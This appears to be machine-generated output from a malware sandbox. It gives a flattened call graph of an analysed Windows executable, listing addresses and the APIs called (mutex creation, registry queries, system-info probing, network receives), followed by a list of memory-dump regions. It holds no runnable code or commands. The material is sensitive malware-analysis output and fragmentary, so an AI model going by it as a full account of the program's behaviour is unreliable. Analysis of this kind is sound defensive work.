12356->12379 12375 6ed0e2 12357->12375 12368 6ed23e 12358->12368 12363 6ecbf1 12362->12363 12364 6e690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12363->12364 12365 6ecc05 12364->12365 12366 6ecc0d __alldvrm __cftof _strrchr 12365->12366 12367 6ecef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12365->12367 12366->12350 12367->12366 12371 6ed26c 12368->12371 12369 6ed2a5 12369->12350 12370 6ed2de 12373 6ecf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12370->12373 12371->12369 12371->12370 12372 6ed2b7 12371->12372 12374 6ed16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12372->12374 12373->12369 12374->12369 12376 6ed10f 12375->12376 12377 6ed14e 12376->12377 12378 6ed16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12376->12378 12377->12350 12378->12377 12380 6ecf10 12379->12380 12381 6ecf75 12380->12381 12382 6ecf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12380->12382 12381->12350 12382->12381 12388 6b3fe0 12389 6b4022 12388->12389 12390 6b408c 12389->12390 12391 6b40d2 12389->12391 12394 6b4035 __floor_pentium4 12389->12394 12395 6b35e0 12390->12395 12392 6b3ee0 3 API calls 12391->12392 12392->12394 12396 6b3616 12395->12396 12400 6b364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 12396->12400 12401 6b2ce0 12396->12401 12398 6b369e 12399 6b2c00 3 API calls 12398->12399 12398->12400 12399->12400 12400->12394 12402 6b2d1d 12401->12402 12403 6cbedf InitOnceExecuteOnce 12402->12403 12405 6b2d46 12403->12405 12404 6b2d88 12408 6b2440 4 API calls 12404->12408 12405->12404 12406 6b2d51 __floor_pentium4 12405->12406 12410 6cbef7 12405->12410 12406->12398 12409 6b2d9b 12408->12409 12409->12398 12411 6cbf03 std::_Throw_future_error 12410->12411 12412 6cbf6a 12411->12412 12413 6cbf73 12411->12413 12417 6cbe7f 12412->12417 12415 6b2ae0 5 API calls 12413->12415 12416 6cbf6f 12415->12416 12416->12404 12418 6ccc31 InitOnceExecuteOnce 12417->12418 12419 6cbe97 12418->12419 12420 6cbe9e 12419->12420 12421 6e6cbb 4 API calls 12419->12421 12420->12416 12422 6cbea7 12421->12422 12422->12416 12504 6b9ba5 12505 6b9ba7 12504->12505 12506 6b5c10 6 API calls 12505->12506 12507 6b9cb1 12506->12507 12508 6b8b30 6 API calls 12507->12508 12509 6b9cc2 12508->12509 12203 6b9ab8 12205 6b9acc 12203->12205 12206 6b9b08 12205->12206 12207 6ba917 12206->12207 12209 6b9b4b shared_ptr 12206->12209 12208 6ba953 Sleep CreateMutexA 12207->12208 12212 6ba98e 12208->12212 12210 6b5c10 6 API calls 12209->12210 12211 6b9b59 12209->12211 12213 6b9b7c 12210->12213 12214 6b8b30 6 API calls 12213->12214 12215 6b9b8d 12214->12215 12216 6b5c10 6 API calls 12215->12216 12217 6b9cb1 12216->12217 12218 6b8b30 6 API calls 12217->12218 12219 6b9cc2 12218->12219 11633 6b87b2 11634 6b87b8 GetFileAttributesA 11633->11634 11635 6b87b6 11633->11635 11636 6b87c4 11634->11636 11635->11634 12060 6b2170 12063 6cc6fc 12060->12063 12062 6b217a 12065 6cc70c 12063->12065 12066 6cc724 12063->12066 12065->12066 12067 6ccfbe 12065->12067 12066->12062 12068 6cccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12067->12068 12069 6ccfd0 12068->12069 12069->12065 12070 6bad70 12071 6baddc shared_ptr 12070->12071 12072 6baec0 shared_ptr __floor_pentium4 12070->12072 12071->12072 12074 6e8ab6 12071->12074 12075 6e8ad1 12074->12075 12076 6e8868 4 API calls 12075->12076 12077 6e8adb 12076->12077 12077->12071 12126 6b8d30 12127 6b8d80 12126->12127 12128 6b5c10 6 API calls 12127->12128 12129 6b8d9a shared_ptr __floor_pentium4 12128->12129 12220 6b42b0 12223 6b3ac0 12220->12223 12222 6b42bb shared_ptr 12224 6b3af9 12223->12224 12225 6b3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12224->12225 12226 6b3c38 12224->12226 12228 6b32d0 6 API calls 12224->12228 12225->12222 12227 6b32d0 6 API calls 12226->12227 12230 6b3c5f 12226->12230 12227->12230 12228->12226 12229 6b3c68 12229->12222 12230->12229 12231 6b3810 4 API calls 12230->12231 12232 6b3cdb 12231->12232 12510 6b77b0 12511 6b77f1 shared_ptr 12510->12511 12512 6b5c10 6 API calls 12511->12512 12514 6b7883 shared_ptr 12511->12514 12512->12514 12513 6b5c10 6 API calls 12516 6b79e3 12513->12516 12514->12513 12515 6b7953 shared_ptr __floor_pentium4 12514->12515 12517 6b5c10 6 API calls 12516->12517 12518 6b7a15 shared_ptr 12517->12518 12519 6b5c10 6 API calls 12518->12519 12524 6b7aa5 shared_ptr __floor_pentium4 12518->12524 12520 6b7b7d 12519->12520 12521 6b5c10 6 API calls 12520->12521 12522 6b7ba0 12521->12522 12523 6b5c10 6 API calls 12522->12523 12523->12524 12525 6b87b0 12526 6b87b8 GetFileAttributesA 12525->12526 12527 6b87b6 12525->12527 12528 6b87c4 12526->12528 12527->12526 12529 6c47b0 12531 6c4eed 12529->12531 12530 6c4f59 shared_ptr __floor_pentium4 12531->12530 12532 6b7d30 7 API calls 12531->12532 12533 6c50ed 12532->12533 12568 6b8380 12533->12568 12535 6c5106 12536 6b5c10 6 API calls 12535->12536 12537 6c5155 12536->12537 12538 6b5c10 6 API calls 12537->12538 12539 6c5171 12538->12539 12574 6b9a00 12539->12574 12569 6b83e5 __cftof 12568->12569 12570 6b5c10 6 API calls 12569->12570 12573 6b8403 shared_ptr __floor_pentium4 12569->12573 12571 6b8427 12570->12571 12572 6b5c10 6 API calls 12571->12572 12572->12573 12573->12535 12575 6b9a3f 12574->12575 12576 6b5c10 6 API calls 12575->12576 12577 6b9a47 12576->12577 12578 6b8b30 6 API calls 12577->12578 12579 6b9a58 12578->12579 12169 6b4276 12170 6b2410 5 API calls 12169->12170 12171 6b427f 12170->12171 12141 6ba9f4 12150 6b9230 12141->12150 12143 6baa03 shared_ptr 12144 6b5c10 6 API calls 12143->12144 12149 6baab3 shared_ptr __floor_pentium4 12143->12149 12145 6baa65 12144->12145 12146 6b5c10 6 API calls 12145->12146 12147 6baa8d 12146->12147 12148 6b5c10 6 API calls 12147->12148 12148->12149 12153 6b9284 shared_ptr 12150->12153 12151 6b5c10 6 API calls 12151->12153 12152 6b9543 shared_ptr __floor_pentium4 12152->12143 12153->12151 12158 6b944f shared_ptr 12153->12158 12154 6b5c10 6 API calls 12154->12158 12155 6b98b5 shared_ptr __floor_pentium4 12155->12143 12156 6b979f shared_ptr 12156->12155 12157 6b5c10 6 API calls 12156->12157 12159 6b9927 shared_ptr __floor_pentium4 12157->12159 12158->12152 12158->12154 12158->12156 12159->12143 12006 6b3c8e 12007 6b3c98 12006->12007 12009 6b3ca5 12007->12009 12014 6b2410 12007->12014 12010 6b3ccf 12009->12010 12011 6b3810 4 API calls 12009->12011 12012 6b3810 4 API calls 12010->12012 12011->12010 12013 6b3cdb 12012->12013 12015 6b2424 12014->12015 12018 6cb52d 12015->12018 12026 6e3aed 12018->12026 12020 6cb5a5 ___std_exception_copy 12033 6cb1ad 12020->12033 12021 6cb598 12029 6caf56 12021->12029 12025 6b242a 12025->12009 12037 6e4f29 12026->12037 12028 6cb555 12028->12020 12028->12021 12028->12025 12030 6caf9f ___std_exception_copy 12029->12030 12032 6cafb2 shared_ptr 12030->12032 12043 6cb39f 12030->12043 12032->12025 12034 6cb1d8 12033->12034 12036 6cb1e1 shared_ptr 12033->12036 12035 6cb39f 5 API calls 12034->12035 12035->12036 12036->12025 12038 6e4f2e __cftof 12037->12038 12038->12028 12039 6ed634 __cftof 4 API calls 12038->12039 12042 6e8bfc __cftof 12038->12042 12039->12042 12040 6e65ed __cftof 3 API calls 12041 6e8c2f 12040->12041 12042->12040 12044 6cbedf InitOnceExecuteOnce 12043->12044 12045 6cb3e1 12044->12045 12046 6cb3e8 12045->12046 12054 6e6cbb 12045->12054 12046->12032 12055 6e6cc7 __cftof 12054->12055 12056 6ea671 __cftof 4 API calls 12055->12056 12059 6e6ccc 12056->12059 12057 6e8bec __cftof 4 API calls 12058 6e6cf6 12057->12058 12059->12057 12172 6e6a44 12173 6e6a5c 12172->12173 12174 6e6a52 12172->12174 12177 6e698d 12173->12177 12176 6e6a76 ___free_lconv_mon 12178 6e690a __cftof 4 API calls 12177->12178 12179 6e699f 12178->12179 12179->12176 11641 6b8780 11642 6b8786 11641->11642 11648 6e6729 11642->11648 11645 6b87a6 11647 6b87a0 11655 6e6672 11648->11655 11650 6b8793 11650->11645 11651 6e67b7 11650->11651 11653 6e67c3 __cftof 11651->11653 11652 6e67cd __cftof 11652->11647 11653->11652 11671 6e6740 11653->11671 11656 6e667e __cftof 11655->11656 11658 6e6685 __cftof 11656->11658 11659 6ea8c3 11656->11659 11658->11650 11660 6ea8cf __cftof 11659->11660 11663 6ea967 11660->11663 11662 6ea8ea 11662->11658 11664 6ea98a 11663->11664 11666 6ea9d0 ___free_lconv_mon 11664->11666 11667 6ed82f 11664->11667 11666->11662 11670 6ed83c __cftof 11667->11670 11668 6ed867 RtlAllocateHeap 11669 6ed87a 11668->11669 11668->11670 11669->11666 11670->11668 11670->11669 11672 6e6762 11671->11672 11674 6e674d __cftof ___free_lconv_mon 11671->11674 11672->11674 11675 6ea038 11672->11675 11674->11652 11676 6ea050 11675->11676 11678 6ea075 11675->11678 11676->11678 11679 6f0439 11676->11679 11678->11674 11680 6f0445 __cftof 11679->11680 11682 6f044d __cftof __dosmaperr 11680->11682 11683 6f052b 11680->11683 11682->11678 11684 6f054d 11683->11684 11688 6f0551 __cftof __dosmaperr 11683->11688 11684->11688 11689 6f00d2 11684->11689 11688->11682 11691 6f00e3 11689->11691 11690 6f0106 11690->11688 11693 6efcc0 11690->11693 11691->11690 11700 6ea671 11691->11700 11694 6efd0d 11693->11694 11733 6e690a 11694->11733 11697 6ec719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 11699 6efd1c __cftof 11697->11699 11698 6effbc __floor_pentium4 11698->11688 11699->11697 11699->11698 11699->11699 11741 6eb67d 11699->11741 11701 6ea67b __cftof 11700->11701 11702 6ed82f __cftof RtlAllocateHeap 11701->11702 11705 6ea694 __cftof ___free_lconv_mon 11701->11705 11702->11705 11703 6ea722 11703->11690 11705->11703 11707 6e8bec 11705->11707 11708 6e8bf1 __cftof 11707->11708 11712 6e8bfc __cftof 11708->11712 11713 6ed634 11708->11713 11727 6e65ed 11712->11727 11715 6ed640 __cftof 11713->11715 11714 6ed69c __cftof 11714->11712 11715->11714 11716 6ed81b __cftof 11715->11716 11717 6ed726 11715->11717 11719 6ed751 __cftof 11715->11719 11718 6e65ed __cftof 3 API calls 11716->11718 11717->11719 11730 6ed62b 11717->11730 11720 6ed82e 11718->11720 11719->11714 11723 6ea671 __cftof 4 API calls 11719->11723 11725 6ed7a5 11719->11725 11723->11725 11724 6ed62b __cftof 4 API calls 11724->11719 11725->11714 11726 6ea671 __cftof 4 API calls 11725->11726 11726->11714 11728 6e64c7 __cftof 3 API calls 11727->11728 11729 6e65fe 11728->11729 11731 6ea671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 11730->11731 11732 6ed630 11731->11732 11732->11724 11734 6e692a 11733->11734 11740 6e6921 11733->11740 11735 6ea671 __cftof 4 API calls 11734->11735 11734->11740 11736 6e694a 11735->11736 11746 6eb5fb 11736->11746 11740->11699 11742 6ea671 __cftof 4 API calls 11741->11742 11743 6eb688 11742->11743 11744 6eb5fb __cftof 4 API calls 11743->11744 11745 6eb698 11744->11745 11745->11699 11747 6eb60e 11746->11747 11748 6e6960 11746->11748 11747->11748 11754 6ef5ab 11747->11754 11750 6eb628 11748->11750 11751 6eb63b 11750->11751 11752 6eb650 11750->11752 11751->11752 11761 6ee6b1 11751->11761 11752->11740 11755 6ef5b7 __cftof 11754->11755 11756 6ea671 __cftof 4 API calls 11755->11756 11758 6ef5c0 __cftof 11756->11758 11757 6ef606 11757->11748 11758->11757 11759 6e8bec __cftof 4 API calls 11758->11759 11760 6ef62b 11759->11760 11762 6ea671 __cftof 4 API calls 11761->11762 11763 6ee6bb 11762->11763 11766 6ee5c9 11763->11766 11765 6ee6c1 11765->11752 11769 6ee5d5 __cftof ___free_lconv_mon 11766->11769 11767 6ee5f6 11767->11765 11768 6e8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 11770 6ee668 11768->11770 11769->11767 11769->11768 11771 6ee6a4 11770->11771 11772 6ea72e __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 11770->11772 11771->11765 11773 6ee695 11772->11773 11774 6ee4b0 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 11773->11774 11774->11771 11969 6b20c0 11972 6cc68b 11969->11972 11971 6b20cc 11975 6cc3d5 11972->11975 11974 6cc69b 11974->11971 11976 6cc3eb 11975->11976 11977 6cc3e1 11975->11977 11976->11974 11978 6cc3be 11977->11978 11979 6cc39e 11977->11979 11988 6ccd0a 11978->11988 11979->11976 11984 6cccd5 11979->11984 11982 6cc3d0 11982->11974 11985 6cc3b7 11984->11985 11986 6ccce3 InitializeCriticalSectionEx 11984->11986 11985->11974 11986->11985 11989 6ccd1f RtlInitializeConditionVariable 11988->11989 11989->11982 11990 6be0c0 recv 11991 6be122 recv 11990->11991 11992 6be157 recv 11991->11992 11994 6be191 11992->11994 11993 6be2b3 __floor_pentium4 11994->11993 11995 6cc6ac GetSystemTimePreciseAsFileTime 11994->11995 11996 6be2ee 11995->11996 11997 6cc26a 5 API calls 11996->11997 11998 6be358 11997->11998 11999 6cd0c7 12000 6cd0d7 11999->12000 12001 6cd17f 12000->12001 12002 6cd17b RtlWakeAllConditionVariable 12000->12002 12165 6b8980 12167 6b8aea 12165->12167 12168 6b89d8 shared_ptr 12165->12168 12166 6b5c10 6 API calls 12166->12168 12168->12166 12168->12167 12180 6b2e00 12181 6b2e28 12180->12181 12182 6cc68b __Mtx_init_in_situ 2 API calls 12181->12182 12183 6b2e33 12182->12183 11882 6b3c47 11883 6b3c51 11882->11883 11886 6b3c5f 11883->11886 11889 6b32d0 11883->11889 11884 6b3c68 11886->11884 11906 6b3810 11886->11906 11910 6cc6ac 11889->11910 11892 6b3314 11893 6b333c __Mtx_unlock 11892->11893 11913 6cc26a 11892->11913 11894 6cc26a 5 API calls 11893->11894 11895 6b3350 __floor_pentium4 11893->11895 11896 6b3377 11894->11896 11895->11886 11897 6cc6ac GetSystemTimePreciseAsFileTime 11896->11897 11898 6b33af 11897->11898 11899 6cc26a 5 API calls 11898->11899 11900 6b33b6 11898->11900 11899->11900 11901 6cc26a 5 API calls 11900->11901 11902 6b33d7 __Mtx_unlock 11900->11902 11901->11902 11903 6cc26a 5 API calls 11902->11903 11904 6b33eb 11902->11904 11905 6b340e 11903->11905 11904->11886 11905->11886 11907 6b381c 11906->11907 11952 6b2440 11907->11952 11917 6cc452 11910->11917 11912 6cc6b9 11912->11892 11914 6cc292 11913->11914 11915 6cc274 11913->11915 11914->11914 11915->11914 11934 6cc297 11915->11934 11918 6cc4a8 11917->11918 11920 6cc47a __floor_pentium4 11917->11920 11918->11920 11923 6ccf6b 11918->11923 11920->11912 11921 6cc4fd __Xtime_diff_to_millis2 11921->11920 11922 6ccf6b _xtime_get GetSystemTimePreciseAsFileTime 11921->11922 11922->11921 11924 6ccf7a 11923->11924 11926 6ccf87 __aulldvrm 11923->11926 11924->11926 11927 6ccf44 11924->11927 11926->11921 11930 6ccbea 11927->11930 11931 6ccbfb GetSystemTimePreciseAsFileTime 11930->11931 11932 6ccc07 11930->11932 11931->11932 11932->11926 11937 6b2ae0 11934->11937 11936 6cc2ae std::_Throw_future_error 11945 6cbedf 11937->11945 11939 6b2aff 11939->11936 11940 6b2af4 __cftof 11940->11939 11941 6ea671 __cftof 4 API calls 11940->11941 11942 6e6ccc 11941->11942 11943 6e8bec __cftof 4 API calls 11942->11943 11944 6e6cf6 11943->11944 11948 6ccc31 11945->11948 11949 6ccc3f InitOnceExecuteOnce 11948->11949 11951 6cbef2 11948->11951 11949->11951 11951->11940 11955 6cb5d6 11952->11955 11954 6b2472 11956 6cb5f1 std::_Throw_future_error 11955->11956 11957 6cb658 __cftof __floor_pentium4 11956->11957 11958 6e8bec __cftof 4 API calls 11956->11958 11957->11954 11959 6cb69f 11958->11959 12247 6b9f44 12249 6b9f4c shared_ptr 12247->12249 12248 6ba953 Sleep CreateMutexA 12250 6ba98e 12248->12250 12249->12248 12251 6ba01f shared_ptr 12249->12251 12083 6b215a 12084 6cc6fc InitializeCriticalSectionEx 12083->12084 12085 6b2164 12084->12085 12580 6b3f9f 12581 6b3fad 12580->12581 12582 6b3fb6 12580->12582 12583 6b2410 5 API calls 12581->12583 12583->12582 12383 6b2b10 12384 6b2b1a 12383->12384 12385 6b2b1c 12383->12385 12386 6cc26a 5 API calls 12385->12386 12387 6b2b22 12386->12387 12584 6b2b90 12585 6b2bce 12584->12585 12586 6cb7fb TpReleaseWork 12585->12586 12587 6b2bdb shared_ptr __floor_pentium4 12586->12587 12423 6c87d0 12424 6c882a __cftof 12423->12424 12430 6c9bb0 12424->12430 12427 6c886c __floor_pentium4 12429 6c88d9 std::_Throw_future_error 12443 6c9ef0 12430->12443 12432 6c9be5 12433 6b2ce0 5 API calls 12432->12433 12434 6c9c16 12433->12434 12447 6c9f70 12434->12447 12436 6c8854 12436->12427 12437 6b43f0 12436->12437 12438 6cbedf InitOnceExecuteOnce 12437->12438 12439 6b440a 12438->12439 12440 6b4411 12439->12440 12441 6e6cbb 4 API calls 12439->12441 12440->12429 12442 6b4424 12441->12442 12444 6c9f0c 12443->12444 12445 6cc68b __Mtx_init_in_situ 2 API calls 12444->12445 12446 6c9f17 12445->12446 12446->12432 12449 6c9fef shared_ptr 12447->12449 12450 6ca058 12449->12450 12452 6ca210 12449->12452 12451 6ca03b 12451->12436 12453 6ca290 12452->12453 12459 6c71d0 12453->12459 12455 6ca2cc shared_ptr 12456 6ca4be shared_ptr 12455->12456 12457 6b3ee0 3 API calls 12455->12457 12456->12451 12458 6ca4a6 12457->12458 12458->12451 12460 6c7211 12459->12460 12467 6b3970 12460->12467 12462 6c7446 __floor_pentium4 12462->12455 12463 6c72ad __cftof 12463->12462 12464 6cc68b __Mtx_init_in_situ 2 API calls 12463->12464 12465 6c7401 12464->12465 12472 6b2ec0 12465->12472 12468 6cc68b __Mtx_init_in_situ 2 API calls 12467->12468 12469 6b39a7 12468->12469 12470 6cc68b __Mtx_init_in_situ 2 API calls 12469->12470 12471 6b39e6 12470->12471 12471->12463 12473 6b2f06 12472->12473 12477 6b2f6f 12472->12477 12474 6cc6ac GetSystemTimePreciseAsFileTime 12473->12474 12475 6b2f12 12474->12475 12478 6b301e 12475->12478 12482 6b2f1d __Mtx_unlock 12475->12482 12476 6b2fef 12476->12462 12477->12476 12483 6cc6ac GetSystemTimePreciseAsFileTime 12477->12483 12479 6cc26a 5 API calls 12478->12479 12480 6b3024 12479->12480 12481 6cc26a 5 API calls 12480->12481 12484 6b2fb9 12481->12484 12482->12477 12482->12480 12483->12484 12485 6cc26a 5 API calls 12484->12485 12486 6b2fc0 __Mtx_unlock 12484->12486 12485->12486 12487 6cc26a 5 API calls 12486->12487 12488 6b2fd8 12486->12488 12487->12488 12488->12476 12489 6cc26a 5 API calls 12488->12489 12490 6b303c 12489->12490 12491 6cc6ac GetSystemTimePreciseAsFileTime 12490->12491 12499 6b3080 shared_ptr __Mtx_unlock 12491->12499 12492 6b315f 12493 6cc26a 5 API calls 12492->12493 12496 6b31d1 12492->12496 12500 6b3193 __Mtx_unlock 12492->12500 12494 6b31cb 12493->12494 12495 6cc26a 5 API calls 12494->12495 12495->12496 12497 6cc26a 5 API calls 12496->12497 12497->12500 12498 6b31a7 __floor_pentium4 12498->12462 12499->12492 12499->12494 12499->12498 12503 6cc6ac GetSystemTimePreciseAsFileTime 12499->12503 12500->12498 12501 6cc26a 5 API calls 12500->12501 12502 6b31dd 12501->12502 12503->12492 11775 6ba856 11776 6ba870 11775->11776 11777 6ba892 shared_ptr 11775->11777 11776->11777 11778 6ba94e 11776->11778 11782 6ba8a0 11777->11782 11791 6b7d30 11777->11791 11780 6ba953 Sleep CreateMutexA 11778->11780 11784 6ba98e 11780->11784 11781 6ba8ae 11781->11782 11783 6b7d30 7 API calls 11781->11783 11785 6ba8b8 11783->11785 11785->11782 11786 6b7d30 7 API calls 11785->11786 11787 6ba8c2 11786->11787 11787->11782 11788 6b7d30 7 API calls 11787->11788 11789 6ba8cc 11788->11789 11789->11782 11790 6b7d30 7 API calls 11789->11790 11790->11782 11792 6b7d96 __cftof 11791->11792 11829 6b7ee8 shared_ptr __floor_pentium4 11792->11829 11830 6b5c10 11792->11830 11794 6b7dd2 11795 6b5c10 6 API calls 11794->11795 11797 6b7dff shared_ptr 11795->11797 11796 6b7ed3 GetNativeSystemInfo 11798 6b7ed7 11796->11798 11797->11796 11797->11798 11797->11829 11799 6b8019 11798->11799 11800 6b7f3f 11798->11800 11798->11829 11801 6b5c10 6 API calls 11799->11801 11802 6b5c10 6 API calls 11800->11802 11804 6b804c 11801->11804 11803 6b7f67 11802->11803 11805 6b5c10 6 API calls 11803->11805 11806 6b5c10 6 API calls 11804->11806 11807 6b7f86 11805->11807 11808 6b806b 11806->11808 11840 6e8bbe 11807->11840 11810 6b5c10 6 API calls 11808->11810 11811 6b80a3 11810->11811 11812 6b5c10 6 API calls 11811->11812 11813 6b80f4 11812->11813 11814 6b5c10 6 API calls 11813->11814 11815 6b8113 11814->11815 11816 6b5c10 6 API calls 11815->11816 11817 6b814b 11816->11817 11818 6b5c10 6 API calls 11817->11818 11819 6b819c 11818->11819 11820 6b5c10 6 API calls 11819->11820 11821 6b81bb 11820->11821 11822 6b5c10 6 API calls 11821->11822 11823 6b81f3 11822->11823 11824 6b5c10 6 API calls 11823->11824 11825 6b8244 11824->11825 11826 6b5c10 6 API calls 11825->11826 11827 6b8263 11826->11827 11828 6b5c10 6 API calls 11827->11828 11828->11829 11829->11781 11831 6b5c54 11830->11831 11843 6b4b30 11831->11843 11833 6b5d17 shared_ptr __floor_pentium4 11833->11794 11834 6b5c7b __cftof 11834->11833 11835 6b5da7 RegOpenKeyExA 11834->11835 11836 6b5e00 RegCloseKey 11835->11836 11838 6b5e26 11836->11838 11837 6b5ea6 shared_ptr __floor_pentium4 11837->11794 11838->11837 11839 6b5c10 4 API calls 11838->11839 11871 6e8868 11840->11871 11842 6e8bdc 11842->11829 11844 6b4b92 11843->11844 11846 6b4ce5 11843->11846 11844->11846 11847 6e6da6 11844->11847 11846->11834 11848 6e6db4 11847->11848 11850 6e6dc2 __fassign 11847->11850 11852 6e6d19 11848->11852 11850->11844 11853 6e690a __cftof 4 API calls 11852->11853 11854 6e6d2c 11853->11854 11857 6e6d52 11854->11857 11856 6e6d3d 11856->11844 11858 6e6d8f 11857->11858 11859 6e6d5f 11857->11859 11860 6eb67d 4 API calls 11858->11860 11862 6e6d6e __fassign 11859->11862 11863 6eb6a1 11859->11863 11860->11862 11862->11856 11864 6e690a __cftof 4 API calls 11863->11864 11865 6eb6be 11864->11865 11867 6eb6ce __floor_pentium4 11865->11867 11868 6ef1bf 11865->11868 11867->11862 11869 6e690a __cftof 4 API calls 11868->11869 11870 6ef1df __cftof __fassign __freea __floor_pentium4 11869->11870 11870->11867 11872 6e887a 11871->11872 11873 6e690a __cftof 4 API calls 11872->11873 11876 6e888f __cftof 11872->11876 11875 6e88bf 11873->11875 11874 6e6d52 4 API calls 11874->11875 11875->11874 11875->11876 11876->11842 12133 6cd111 12135 6cd122 12133->12135 12134 6cd12a 12135->12134 12137 6cd199 12135->12137 12138 6cd1a7 SleepConditionVariableCS 12137->12138 12140 6cd1c0 12137->12140 12138->12140 12140->12135

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 006E652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,006E652A,?,?,?,?,?,006E7661), ref: 006E6566
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
